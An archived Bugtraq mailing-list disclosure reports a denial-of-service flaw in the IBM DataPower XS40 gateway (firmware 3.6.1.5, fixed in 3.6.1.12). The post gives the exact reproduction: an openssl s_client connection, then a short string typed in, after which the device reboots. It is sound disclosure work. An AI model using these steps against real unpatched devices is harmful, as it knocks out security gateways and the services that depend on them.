[IBM Datapower XS40] Denial of Service

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [IBM Datapower XS40] Denial of Service
From: erik@xxxxxxxx
Date: Thu, 8 Jan 2009 03:14:51 -0700
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

It appears it is possible to crash the IBM DataPower XS40 Security Gateway 
device by sending a simple (random?) string to it, over an established 
SSL-connection. The device reboots as a response to the input.

Tested vulnerable firmware is 3.6.1.5
Issue fixed as tested in 3.6.1.12

Tested as follows (entered attack-string is ´abc´ in this case):
openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
CONNECTED(0000078C)
..
---
abc [enter][enter]

read:errno=0

After this, the device crashes and reboots

Prev by Date: PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
Next by Date: CORE-2008-1128: Openfire multiple vulnerabilities
Previous by thread: PHP-Fusion Mod vArcade 1.8 Sql Injection Vulnerability
Next by thread: Re: [IBM Datapower XS40] Denial of Service
Index(es):
- Date
- Thread